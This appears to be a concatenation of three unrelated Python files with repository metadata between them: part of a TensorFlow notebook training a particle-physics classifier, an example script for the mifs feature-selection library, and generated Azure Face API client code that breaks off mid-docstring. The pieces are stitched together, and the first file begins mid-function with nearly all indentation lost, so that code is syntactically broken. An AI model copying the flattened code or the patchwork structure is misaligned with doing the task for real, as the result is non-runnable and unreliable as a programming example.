h1 = dropout_selu(a1, rate = 1 - keep_prob, training = training_phase)
shape = [1024, 1024]
name = 'w2'
with tf.variable_scope(name) as scope:
w2 = layer_weights(shape = shape, initializer = SELU_initializer)
b2 = layer_biases(shape = [shape[1]])
        # Apply the SELU non-linearity
a2 = selu(tf.add(tf.matmul(h1, w2), b2))
h2 = dropout_selu(a2, rate = 1 - keep_prob, training = training_phase)
name = 'w3'
shape = [1024, 512]
with tf.variable_scope(name) as scope:
w3 = layer_weights(shape = shape, initializer = SELU_initializer)
b3 = layer_biases(shape = [shape[1]])
        # Apply the SELU non-linearity
a3 = selu(tf.add(tf.matmul(h2, w3), b3))
h3 = dropout_selu(a3, rate = 1 - keep_prob, training = training_phase)
shape = [512, 2]
name = 'w4'
with tf.variable_scope(name) as scope:
w4 = layer_weights(shape = shape, initializer = SELU_initializer)
b4 = layer_biases(shape = [shape[1]])
        # Linear readout layer: no non-linearity or dropout here
readout = tf.add(tf.matmul(h3, w4), b4)
return readout
def readout_ops(x, shape, name, initializer = tf.contrib.layers.xavier_initializer()):
# Don't apply non-linearity, dropout on output layer
with tf.variable_scope(name) as scope:
weights = layer_weights(shape = shape, initializer = initializer)
biases = layer_biases(shape = [shape[1]])
layer_output = tf.matmul(x, weights) + biases
return layer_output
def BN_layer_ops(x, shape, name, keep_prob, phase, activation=tf.nn.relu):
# High-level implementation of BN
with tf.variable_scope(name) as scope:
# scope.reuse_variables() # otherwise tf.get_variable() checks that already existing vars are not shared by accident
weights = layer_weights(shape = shape)
biases = layer_biases(shape = [shape[1]])
z_BN = tf.matmul(x, weights) + biases
# Place BN transform before non-linearity - update to TF 1.2!
theta_BN = tf.contrib.layers.batch_norm(z_BN, center=True, scale=True,is_training=phase,
decay=0.99, zero_debias_moving_mean=True, scope='bn', fused = True)
BN_actv = activation(theta_BN)
BN_layer_output = tf.nn.dropout(BN_actv, keep_prob)
return BN_layer_output
def SELU_BN_layer_ops(x, shape, name, keep_prob, phase):
# High-level implementation of BN
with tf.variable_scope(name) as scope:
# scope.reuse_variables() # otherwise tf.get_variable() checks that already existing vars are not shared by accident
weights = layer_weights(shape = shape)
biases = layer_biases(shape = [shape[1]])
z_BN = tf.matmul(x, weights) + biases
# Place BN transform before non-linearity - update to TF 1.2!
theta_BN = tf.contrib.layers.batch_norm(z_BN, center=True, scale=True,is_training=phase,
decay=0.99, zero_debias_moving_mean=True, scope='bn', fused = True)
BN_actv = selu(theta_BN)
BN_layer_output = dropout_selu(BN_actv, rate = 1 - keep_prob, training = phase)
return BN_layer_output
def network_builder(x, n_layers, hidden_layer_nodes, keep_prob, training_phase):
assert n_layers == len(hidden_layer_nodes), 'Specified layer nodes and number of layers do not correspond.'
layers = [x]
if config.builder == 'bn':
print('Building ReLU + Batch-norm architecture')
builder = BN_layer_ops
elif config.builder == 'selu':
print('Building SELU architecture')
builder = hidden_SELU_ops
elif config.builder == 'selu-bn':
print('Building SELU + Batch-norm architecture')
builder = SELU_BN_layer_ops
else:
print('Default architecture: SELU')
builder = hidden_SELU_ops
with tf.variable_scope('hidden_layers') as scope:
hidden_1 = builder(x, shape = [config.n_features, hidden_layer_nodes[0]], name = 'hidden0',
keep_prob = keep_prob, phase = training_phase)
layers.append(hidden_1)
for n in range(0,n_layers-1):
hidden_n = builder(layers[-1], shape = [hidden_layer_nodes[n], hidden_layer_nodes[n+1]], name = 'hidden{}'.format(n+1),
keep_prob = keep_prob, phase = training_phase)
layers.append(hidden_n)
readout = readout_ops(layers[-1], shape = [hidden_layer_nodes[-1], config.n_classes], name = 'readout', initializer = SELU_initializer)
return readout
def build_SELU_network(x, n_layers, hidden_layer_nodes, keep_prob, training_phase):
assert n_layers == len(hidden_layer_nodes), 'Specified layer nodes and number of layers do not correspond.'
layers = [x]
with tf.variable_scope('SELU_layers') as scope:
hidden_1 = hidden_SELU_ops(x, shape = [config.n_features, hidden_layer_nodes[0]], name = 'SELUhidden0',
keep_prob = keep_prob, phase = training_phase)
layers.append(hidden_1)
for n in range(0,n_layers-1):
hidden_n = hidden_SELU_ops(layers[-1], shape = [hidden_layer_nodes[n], hidden_layer_nodes[n+1]], name = 'SELUhidden{}'.format(n+1),
keep_prob = keep_prob, phase = training_phase)
layers.append(hidden_n)
readout = readout_ops(layers[-1], shape = [hidden_layer_nodes[-1], config.n_classes], name = 'readout', initializer = SELU_initializer)
return readout
def build_network(x, n_layers, hidden_layer_nodes, keep_prob, training_phase):
assert n_layers == len(hidden_layer_nodes), 'Specified layer nodes and number of layers do not correspond.'
layers = [x]
with tf.variable_scope('BN_layers') as scope:
hidden_1 = BN_layer_ops(x, shape = [config.n_features, hidden_layer_nodes[0]], name = 'BNhidden0',
keep_prob = keep_prob, phase = training_phase)
layers.append(hidden_1)
for n in range(0,n_layers-1):
hidden_n = BN_layer_ops(layers[-1], shape = [hidden_layer_nodes[n], hidden_layer_nodes[n+1]], name = 'BNhidden{}'.format(n+1),
keep_prob = keep_prob, phase = training_phase)
layers.append(hidden_n)
readout = readout_ops(layers[-1], shape = [hidden_layer_nodes[-1], config.n_classes], name = 'readout')
return readout
def plot_ROC_curve(network_output, y_true, meta = ''):
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.metrics import roc_curve, auc
y_score = network_output[:,1]
# Compute ROC curve, integrate
fpr, tpr, thresholds = roc_curve(y_true, y_score)
roc_auc = auc(fpr, tpr)
plt.figure()
plt.axes([.1,.1,.8,.7])
plt.figtext(.5,.9, r'$\mathrm{Receiver \;Operating \;Characteristic}$', fontsize=15, ha='center')
plt.figtext(.5,.85, meta, fontsize=10,ha='center')
plt.plot(fpr, tpr, color='darkorange',
lw=2, label='ROC (area = %0.2f)' % roc_auc)
plt.plot([0, 1], [0, 1], color='navy', lw=1.0, linestyle='--')
plt.xlim([-0.05, 1.05])
plt.ylim([-0.05, 1.05])
plt.xlabel(r'$\mathrm{False \;Positive \;Rate}$')
plt.ylabel(r'$\mathrm{True \;Positive \;Rate}$')
plt.legend(loc="lower right")
plt.savefig(os.path.join('graphs', '{}_{}_ROC.pdf'.format(config.channel, config.mode)), format='pdf', dpi=1000)
plt.show()
plt.gcf().clear()
def cosine_anneal(initial_lr, t, T, M):
from math import ceil
beta = initial_lr/2 * (np.cos(np.pi* (t % ceil(T/M))/ceil(T/M)) + 1)
return beta
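# Worked illustration of the schedule above (values are approximate): with
# initial_lr = 8e-5, T = 1000 steps and M = 8 cycles, each cycle lasts
# ceil(T/M) = 125 steps and the rate warm-restarts at every cycle boundary:
#
#   [cosine_anneal(8e-5, t, 1000, 8) for t in (0, 62, 124, 125)]
#   # -> [8.0e-05, ~4.0e-05, ~0.0, 8.0e-05]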
# In[4]:
test_file = '/data/projects/punim0011/jtan/data/dnn/norm_dnn_train_B2rho0gamma_kst.h5'
df_X_train, df_X_test, df_y_train, df_y_test = load_data(test_file)
df_y_train = df_y_train.astype(np.int8)
df_y_test = df_y_test.astype(np.int8)
df_train = pd.concat([df_X_train, df_y_train], axis = 1)
df_test = pd.concat([df_X_test, df_y_test], axis = 1)
config.n_features = df_train.shape[1]-1
config.steps_per_epoch = df_train.shape[0] // config.batch_size
config.T = config.steps_per_epoch*config.num_epochs
readerTrain = reader(df_train)
readerTest = reader(df_test)
# In[5]:
class vanillaDNN():
# Builds the computational graph
def __init__(self, config, training = True, cyclical = False):
self.x = tf.placeholder(tf.float32, shape = [None, config.n_features])
self.y_true = tf.placeholder(tf.int32, shape = None)
self.keep_prob = tf.placeholder(tf.float32)
self.training_phase = tf.placeholder(tf.bool)
if cyclical:
self.beta = tf.placeholder(tf.float32)
else:
self.beta = config.learning_rate
# Anneal learning rate
self.global_step = tf.Variable(0, trainable=False)
# self.beta = tf.train.exponential_decay(config.learning_rate, self.global_step,
# decay_steps = config.steps_per_epoch, decay_rate = config.lr_epoch_decay, staircase=True)
# if config.builder == 'selu':
# print('Using SELU activation')
# self.readout = build_SELU_network(self.x, config.n_layers, config.hidden_layer_nodes, self.keep_prob, self.training_phase)
# self.cross_entropy = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits = self.readout, labels = self.y_true))
# self.opt_op = tf.train.AdamOptimizer(self.beta).minimize(self.cross_entropy, name = 'optimizer',
# global_step = self.global_step)
self.readout = network_builder(self.x, config.n_layers, config.hidden_layer_nodes, self.keep_prob, self.training_phase)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
self.cross_entropy = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits = self.readout, labels = self.y_true))
with tf.control_dependencies(update_ops):
# Ensures that we execute the update_ops before performing the train_step
self.opt_op = tf.train.AdamOptimizer(self.beta).minimize(self.cross_entropy, name = 'optimizer',
global_step = self.global_step)
ema = tf.train.ExponentialMovingAverage(decay = config.ema_decay, num_updates = self.global_step)
maintain_averages_op = ema.apply(tf.trainable_variables())
with tf.control_dependencies([self.opt_op]):
self.train_op = tf.group(maintain_averages_op)
# Evaluation metrics
self.prediction = tf.nn.softmax(self.readout)
correct_prediction = tf.equal(tf.cast(tf.argmax(self.readout, 1), tf.int32), self.y_true)
self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
_, self.auc_op = tf.metrics.auc(predictions = tf.argmax(self.readout,1), labels = self.y_true, num_thresholds = 1024)
tf.summary.scalar('accuracy', self.accuracy)
tf.summary.scalar('auc', self.auc_op)
tf.summary.scalar('learning_rate', self.beta)
tf.summary.scalar('cross_entropy', self.cross_entropy)
self.merge_op = tf.summary.merge_all()
self.train_writer = tf.summary.FileWriter(
os.path.join(directories.tensorboard, 'train_{}'.format(time.strftime('%d-%m_%I:%M'))), graph = tf.get_default_graph())
self.test_writer = tf.summary.FileWriter(
os.path.join(directories.tensorboard, 'test_{}'.format(time.strftime('%d-%m_%I:%M'))))
def predict(self, ckpt, metaGraph = None):
# Restore the moving average version of the learned variables for eval.
variable_averages = tf.train.ExponentialMovingAverage(config.ema_decay)
variables_to_restore = variable_averages.variables_to_restore()
saver = tf.train.Saver(variables_to_restore)
with tf.Session() as sess:
# Initialize variables
init_op = tf.global_variables_initializer()
sess.run(init_op)
sess.run(tf.local_variables_initializer())
start_time = time.time()
assert (ckpt.model_checkpoint_path or metaGraph), 'Missing checkpoint file!'
if metaGraph:
saver = tf.train.import_meta_graph(metaGraph)
saver.restore(sess, os.path.splitext(metaGraph)[0])
print('{} restored.'.format(metaGraph))
else:
saver.restore(sess, ckpt.model_checkpoint_path)
print('{} restored.'.format(ckpt.model_checkpoint_path))
# Make predictions using the trained model
feed_dict_test = {self.x: df_X_test.values, self.y_true: df_y_test.values, self.keep_prob: 1.0, self.training_phase: False}
network_output_test, final_v_acc, final_v_auc = sess.run(
[self.prediction, self.accuracy, self.auc_op], feed_dict = feed_dict_test)
print("Validation accuracy: {:g}\nValidation AUC: {:g}".format(final_v_acc, final_v_auc))
plot_ROC_curve(network_output = network_output_test, y_true = df_y_test.values, meta = architecture)
delta_t = time.time() - start_time
print("Inference complete. Duration: %g s" %(delta_t))
return network_output_test
# In[6]:
def train(config, restore = False):
# Executes training operations
vDNN = vanillaDNN(config, training = True)
start_time = time.time()
v_acc_best = 0.
global_step = 0
saver = tf.train.Saver()
ckpt = tf.train.get_checkpoint_state(directories.checkpoints)
with tf.Session(config=tf.ConfigProto(allow_soft_placement=True, log_device_placement=True)) as sess:
# Initialize variables
init_op = tf.global_variables_initializer()
sess.run(init_op)
if restore and ckpt.model_checkpoint_path:
saver.restore(sess, ckpt.model_checkpoint_path)
print('{} restored.'.format(ckpt.model_checkpoint_path))
for epoch in range(config.num_epochs):
readerTrain.proceed = True
step = 0
# Save every 10 epochs
if epoch % 10 == 0:
save_path = saver.save(sess,
os.path.join(directories.checkpoints,
'vDNN_{}_{}_epoch{}.ckpt'.format(config.mode, config.channel, epoch)),
global_step = epoch)
print('Graph saved to file: {}'.format(save_path))
print('(*) Entering Epoch {} ({:.3f} s)'.format(epoch, time.time() - start_time))
# T_c = epoch % config.T_i
# eta_min, eta_max = sess.run([vDNN.eta_min, vDNN.eta_max])
# eta = eta_min + 1/2*(eta_max - eta_min)*(1+np.cos(np.pi*(T_c/config.T_i)))
# print('Learning rate: {}'.format(eta))
while(readerTrain.proceed):
# Iterate through entire corpus
x_train, y_train = readerTrain.next_batch(config.batch_size)
beta = cosine_anneal(config.learning_rate, global_step, config.T, config.cycles)
feed_dict_train = {vDNN.x: x_train.values, vDNN.y_true: y_train.values,
vDNN.keep_prob: config.keep_prob, vDNN.training_phase: True}#, vDNN.beta: beta}
t_op = sess.run(vDNN.train_op, feed_dict = feed_dict_train)
step += 1
global_step += 1
if step % (config.steps_per_epoch // 5) == 0:
# Evaluate model
improved = ''
sess.run(tf.local_variables_initializer())
x_test, y_test = readerTest.next_batch(config.batch_size)
feed_dict_test = {vDNN.x: x_test.values, vDNN.y_true: y_test.values, vDNN.keep_prob: 1.0,
vDNN.training_phase: False}#, vDNN.beta: 0.0}
t_acc, t_loss, t_summary = sess.run([vDNN.accuracy, vDNN.cross_entropy, vDNN.merge_op],
feed_dict = feed_dict_train)
v_acc, v_loss, v_auc, v_summary, = sess.run([vDNN.accuracy, vDNN.cross_entropy, vDNN.auc_op, vDNN.merge_op],
feed_dict = feed_dict_test)
vDNN.train_writer.add_summary(t_summary, step)
vDNN.test_writer.add_summary(v_summary, step)
if epoch > 5 and v_acc > v_acc_best:
v_acc_best = v_acc
improved = '[*]'
save_path = saver.save(sess,
os.path.join(directories.checkpoints,
'vDNN_{}_{}_best.ckpt'.format(config.mode, config.channel)),
global_step = epoch)
print('Epoch {}, Step {} | Training Acc: {:.3f} | Test Acc: {:.3f} | Test Loss: {:.3f} | Test AUC {:.3f} ({:.2f} s) {}'
.format(epoch, step, t_acc, v_acc, v_loss, v_auc, time.time() - start_time, improved))
save_path = saver.save(sess, os.path.join(directories.checkpoints, 'vDNN_{}_{}_end.ckpt'.format(config.mode, config.channel)),
global_step = epoch)
print('Model saved to file: {}'.format(save_path))
feed_dict_train = {vDNN.x: df_X_train.values, vDNN.y_true: df_y_train.values, vDNN.keep_prob: 1.0, vDNN.training_phase: False}
feed_dict_test = {vDNN.x: df_X_test.values, vDNN.y_true: df_y_test.values, vDNN.keep_prob: 1.0, vDNN.training_phase: False}
final_t_acc = vDNN.accuracy.eval(feed_dict = feed_dict_train)
final_v_acc, final_v_AUC = sess.run([vDNN.accuracy, vDNN.auc_op], feed_dict = feed_dict_test)
delta_t = time.time() - start_time
print("Training Complete. Time elapsed: {:.3f} s".format(delta_t))
print("Train accuracy: {:g}\nValidation accuracy: {:g}\nValidation AUC: {:g}".format(final_t_acc, final_v_acc, final_v_AUC))
print('Architecture: {}'.format(architecture))
save_summary(config, delta_t, final_t_acc, final_v_acc, final_v_AUC)
# In[ ]:
train(config)
# In[ ]:
train(config)#, restore = True)
# #### Making Predictions
# Classification on a new instance is given by the softmax of the output of the final readout layer.
# In[12]:
ckpt = tf.train.get_checkpoint_state(directories.checkpoints)
tf.reset_default_graph()  # rebuild the graph cleanly so the inference model does not clash with variables created by train()
vDNN = vanillaDNN(config, training = False)
network_output = vDNN.predict(ckpt)
np.save(os.path.join(directories.checkpoints, '{}_{}_y_pred.npy'.format(config.channel, config.mode)), network_output)
np.save(os.path.join(directories.checkpoints, '{}_{}_y_test.npy'.format(config.channel, config.mode)), df_y_test.values)
# In[ ]:
|
Justin-Tan/hep-analysis
|
classifiers/selu_dnn.py
|
Python
|
gpl-3.0
| 27,946
|
"""
Example showing the use of the mifs module.
"""
import mifs
from sklearn.datasets import make_classification, make_regression
import numpy as np
def check_selection(selected, i, r):
"""
Check FN, FP, TP ratios among the selected features.
"""
    # compare the selected features against the true informative + redundant set
try:
selected = set(selected)
all_f = set(range(i+r))
TP = len(selected.intersection(all_f))
FP = len(selected - all_f)
FN = len(all_f - selected)
if (TP+FN) > 0:
sens = TP/float(TP + FN)
else:
sens = np.nan
if (TP+FP) > 0:
prec = TP/float(TP + FP)
else:
prec = np.nan
except:
sens = np.nan
prec = np.nan
return sens, prec
if __name__ == '__main__':
# variables for dataset
s = 200
f = 100
i = int(.1*f)
r = int(.05*f)
c = 2
# simulate dataset with discrete class labels in y
X, y = make_classification(n_samples=s, n_features=f, n_informative=i,
n_redundant=r, n_clusters_per_class=c,
random_state=0, shuffle=False)
# perform feature selection
MIFS = mifs.MutualInformationFeatureSelector(method='JMI', verbose=2)
MIFS.fit(X,y)
# calculate precision and sensitivity
sens, prec = check_selection(np.where(MIFS._support_mask)[0], i, r)
print ('Sensitivity: ' + str(sens) + ' Precision: ' + str(prec))
# simulate dataset with continuous y
X, y = make_regression(n_samples=s, n_features=f, n_informative=i,
random_state=0, shuffle=False)
# perform feature selection
MIFS = mifs.MutualInformationFeatureSelector(method='JMI', verbose=2,
categorical = False)
MIFS.fit(X,y)
# calculate precision and sensitivity
sens, prec = check_selection(np.where(MIFS._support_mask)[0], i, r)
print ('Sensitivity: ' + str(sens) + ' Precision: ' + str(prec))
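    # A small illustrative sketch (the selected indices below are made up, not a real
    # selection): because the datasets above use shuffle=False, the informative and
    # redundant features occupy the first i + r columns, which is why check_selection()
    # compares the selection against range(i + r). For selected = {0, 1, 5, 99} with
    # i + r = 15: TP = 3, FP = 1, FN = 12, so sensitivity = 3/15 = 0.2 and precision = 3/4 = 0.75.
    demo_sens, demo_prec = check_selection({0, 1, 5, 99}, 10, 5)
    print ('Demo sensitivity: ' + str(demo_sens) + ' Demo precision: ' + str(demo_prec))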
|
danielhomola/mifs
|
examples/examples.py
|
Python
|
bsd-3-clause
| 2,058
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from .. import models
class FaceListOperations(object):
"""FaceListOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
def create(
self, face_list_id, name=None, user_data=None, custom_headers=None, raw=False, **operation_config):
"""Create an empty face list. Up to 64 face lists are allowed to exist in
one subscription.
:param face_list_id: Id referencing a particular face list.
:type face_list_id: str
:param name: User defined name, maximum length is 128.
:type name: str
:param user_data: User specified data. Length should not exceed 16KB.
:type user_data: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`APIErrorException<azure.cognitiveservices.vision.face.models.APIErrorException>`
"""
body = models.NameAndUserDataContract(name=name, user_data=user_data)
# Construct URL
url = '/facelists/{faceListId}'
path_format_arguments = {
'AzureRegion': self._serialize.url("self.config.azure_region", self.config.azure_region, 'AzureRegions', skip_quote=True),
'faceListId': self._serialize.url("face_list_id", face_list_id, 'str', max_length=64, pattern=r'^[a-z0-9-_]+$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(body, 'NameAndUserDataContract')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.APIErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def get(
self, face_list_id, custom_headers=None, raw=False, **operation_config):
"""Retrieve a face list's information.
:param face_list_id: Id referencing a particular face list.
:type face_list_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: FaceList or ClientRawResponse if raw=true
:rtype: ~azure.cognitiveservices.vision.face.models.FaceList or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`APIErrorException<azure.cognitiveservices.vision.face.models.APIErrorException>`
"""
# Construct URL
url = '/facelists/{faceListId}'
path_format_arguments = {
'AzureRegion': self._serialize.url("self.config.azure_region", self.config.azure_region, 'AzureRegions', skip_quote=True),
'faceListId': self._serialize.url("face_list_id", face_list_id, 'str', max_length=64, pattern=r'^[a-z0-9-_]+$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.APIErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('FaceList', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update(
self, face_list_id, name=None, user_data=None, custom_headers=None, raw=False, **operation_config):
"""Update information of a face list.
:param face_list_id: Id referencing a particular face list.
:type face_list_id: str
:param name: User defined name, maximum length is 128.
:type name: str
:param user_data: User specified data. Length should not exceed 16KB.
:type user_data: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`APIErrorException<azure.cognitiveservices.vision.face.models.APIErrorException>`
"""
body = models.NameAndUserDataContract(name=name, user_data=user_data)
# Construct URL
url = '/facelists/{faceListId}'
path_format_arguments = {
'AzureRegion': self._serialize.url("self.config.azure_region", self.config.azure_region, 'AzureRegions', skip_quote=True),
'faceListId': self._serialize.url("face_list_id", face_list_id, 'str', max_length=64, pattern=r'^[a-z0-9-_]+$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(body, 'NameAndUserDataContract')
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.APIErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, face_list_id, custom_headers=None, raw=False, **operation_config):
"""Delete an existing face list according to faceListId. Persisted face
images in the face list will also be deleted.
:param face_list_id: Id referencing a particular face list.
:type face_list_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`APIErrorException<azure.cognitiveservices.vision.face.models.APIErrorException>`
"""
# Construct URL
url = '/facelists/{faceListId}'
path_format_arguments = {
'AzureRegion': self._serialize.url("self.config.azure_region", self.config.azure_region, 'AzureRegions', skip_quote=True),
'faceListId': self._serialize.url("face_list_id", face_list_id, 'str', max_length=64, pattern=r'^[a-z0-9-_]+$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.APIErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def list(
self, custom_headers=None, raw=False, **operation_config):
"""Retrieve information about all existing face lists. Only faceListId,
name and userData will be returned.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype: list[~azure.cognitiveservices.vision.face.models.FaceList] or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`APIErrorException<azure.cognitiveservices.vision.face.models.APIErrorException>`
"""
# Construct URL
url = '/facelists'
path_format_arguments = {
'AzureRegion': self._serialize.url("self.config.azure_region", self.config.azure_region, 'AzureRegions', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.APIErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('[FaceList]', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def delete_face(
self, face_list_id, persisted_face_id, custom_headers=None, raw=False, **operation_config):
"""Delete an existing face from a face list (given by a persisitedFaceId
and a faceListId). Persisted image related to the face will also be
deleted.
:param face_list_id: Id referencing a particular face list.
:type face_list_id: str
:param persisted_face_id: Id referencing a particular persistedFaceId
of an existing face.
:type persisted_face_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`APIErrorException<azure.cognitiveservices.vision.face.models.APIErrorException>`
"""
# Construct URL
url = '/facelists/{faceListId}/persistedFaces/{persistedFaceId}'
path_format_arguments = {
'AzureRegion': self._serialize.url("self.config.azure_region", self.config.azure_region, 'AzureRegions', skip_quote=True),
'faceListId': self._serialize.url("face_list_id", face_list_id, 'str', max_length=64, pattern=r'^[a-z0-9-_]+$'),
'persistedFaceId': self._serialize.url("persisted_face_id", persisted_face_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.APIErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def add_face_from_url(
self, face_list_id, url, user_data=None, target_face=None, custom_headers=None, raw=False, **operation_config):
"""Add a face to a face list. The input face is specified as an image with
a targetFace rectangle. It returns a persistedFaceId representing the
added face, and persistedFaceId will not expire.
:param face_list_id: Id referencing a particular face list.
:type face_list_id: str
:param url:
:type url: str
:param user_data: User-specified data about the face for any purpose.
The maximum length is 1KB.
:type user_data: str
:param target_face: A face rectangle to specify the target face to be
added to a person in the format of "targetFace=left,top,width,height".
E.g. "targetFace=10,10,100,100". If there is more than one face in the
image, targetFace is required to specify which face to add. No
targetFace means there is only one face detected in the entire image.
:type target_face: list[int]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: PersistedFace or ClientRawResponse if raw=true
:rtype: ~azure.cognitiveservices.vision.face.models.PersistedFace or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`APIErrorException<azure.cognitiveservices.vision.face.models.APIErrorException>`
"""
image_url = models.ImageUrl(url=url)
# Construct URL
url = '/facelists/{faceListId}/persistedFaces'
path_format_arguments = {
'AzureRegion': self._serialize.url("self.config.azure_region", self.config.azure_region, 'AzureRegions', skip_quote=True),
'faceListId': self._serialize.url("face_list_id", face_list_id, 'str', max_length=64, pattern=r'^[a-z0-9-_]+$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if user_data is not None:
query_parameters['userData'] = self._serialize.query("user_data", user_data, 'str', max_length=1024)
if target_face is not None:
query_parameters['targetFace'] = self._serialize.query("target_face", target_face, '[int]', div=',')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(image_url, 'ImageUrl')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.APIErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('PersistedFace', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def add_face_from_stream(
self, face_list_id, image, user_data=None, target_face=None, custom_headers=None, raw=False, callback=None, **operation_config):
"""Add a face to a face list. The input face is specified as an image with
a targetFace rectangle. It returns a persistedFaceId representing the
added face, and persistedFaceId will not expire.
:param face_list_id: Id referencing a particular face list.
:type face_list_id: str
:param image: An image stream.
:type image: Generator
:param user_data: User-specified data about the face for any purpose.
The maximum length is 1KB.
:type user_data: str
:param target_face: A face rectangle to specify the target face to be
added to a person in the format of "targetFace=left,top,width,height".
E.g. "targetFace=10,10,100,100". If there is more than one face in the
image, targetFace is required to specify which face to add. No
targetFace means there is only one face detected in the entire image.
:type target_face: list[int]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param callback: When specified, will be called with each chunk of
data that is streamed. The callback should take two arguments, the
bytes of the current chunk of data and the response object. If the
data is uploading, response will be None.
